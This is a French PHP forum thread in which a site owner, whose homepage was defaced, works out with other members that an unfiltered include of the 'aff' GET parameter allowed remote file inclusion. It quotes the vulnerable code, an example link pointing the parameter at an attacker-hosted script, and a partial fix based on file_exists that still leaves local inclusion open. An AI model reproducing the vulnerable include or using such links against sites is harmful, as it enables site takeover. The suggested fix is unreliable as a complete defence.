PHPfrance

la communauté d'entraide francophone dédiée au PHP

hack de mon site

8 messages   •   Page 1 sur 1
   Outils de sujet
Aï Aï
Invité n'ayant pas de compte PHPfrance

21 août 2006, 22:36

Salut,
Je me suis fais pirater mon site, glups.
J'ai eu ça comme message :
Defaced by Great
Hehe. Administrator, you should carefully watch over your site ;)
No data has been deleted from your site.

Greetz: DaMaGeLaB.OrG, specially to Duke03 =)
Fuckz: Web-hack.ru, specially to Terabyte

To administrator: your script txt/index.php has the serious error. You should filter input parameter 'aff' to provide unauthorized access to your site

See you again soon ;)
Qui peut m'aider à comprendre d'ou vient mon problème et comment ils ont fait afin que je corrive ma faille de sécurité !
Merci beaucoup
:evil:
ViPHP
ViPHP | 2144 Messages

21 août 2006, 22:58

Sans code, on ne peu rien te dire....
Aï Aî
Invité n'ayant pas de compte PHPfrance

21 août 2006, 23:10

Re,
Je crois que ça vient de ça :
J'ai fait des liens comme ça :

<a href="index.php?aff=page.php">nomdelapage</a
je crois comprendre dans le message du haker qu'il entre car je ne filtre pas le aff.
Est-ce que le code que j'ai mis ne permet pas en fait d'exécuter un code php s'il remplace "page.php" par un code en mettant par exemple :

<a href="index.php?aff=http://www.sonsite.php/soncodepirate.ph ... elapage</a ?
En fait il a réussi à changer ma page d'accueil.

Merci bien pour votre aide.
Mammouth du PHP | 19672 Messages

21 août 2006, 23:15

Comme l'a mentionné iclo, sans code, on peut rien faire et comme tu ne précises même pas l'url du site, on pourra même pas avoir une idée de la méthode d'intrusion utilisée. Ton site est fait avec quoi au juste ? Un CMS ou c'est une construction maison complète ?
Codez en pensant que celui qui maintiendra votre code est un psychopathe qui connait votre adresse :axe:
Aï Aï
Invité n'ayant pas de compte PHPfrance

21 août 2006, 23:28

Salut Cyrano,
En fait, c'est une construction maison.

Je fais ça :

J'affiche un menu avec des liens comme ça :
<a href="page1.php?aff=page1.php">page 1</a
<a href="page2.php?aff=page2.php">page 2</a
$aff = $_GET['aff'];
include ($aff);
Vous comprenez ?
Je crois qu'avec ce code, je permets à quelqu'un d'exécuter un code php (puisqu'il y a le include) si la personne remplace : aff=page2.php par l'adresse d'un code.
Est-ce possible ?
Merci
Eléphant du PHP | 197 Messages

22 août 2006, 00:50

avant ton include, rajoute :
if (file_exists($aff)) {
include $aff; }
else {
include "autrepage.php";
}
pour répondre à ta quesion oui, va voir la doc de la fonction include

enfin, petit conseil, évite de mettre des url avec des .php genre "index.php?page=users.php" mais plutot "index.php?page=users" ou mieux "users.php" (avec un rewriting url par .htacces)
ViPHP
ViPHP | 2144 Messages

22 août 2006, 01:02

En effet, c'est une belle faille de sécurité.
La règle de base, c'est de ne jamais faire confiance aux informations de l'utilisateur.
Aï Aî
Invité n'ayant pas de compte PHPfrance

22 août 2006, 11:46

Merci à vous.
j'ai fait une belle boulette.
Au moins je connais l'origine de la faille et je vais pouvoir la corriger.
Merci à vous.
:)
   Répondre
8 messages   •   Page 1 sur 1
   Outils de sujet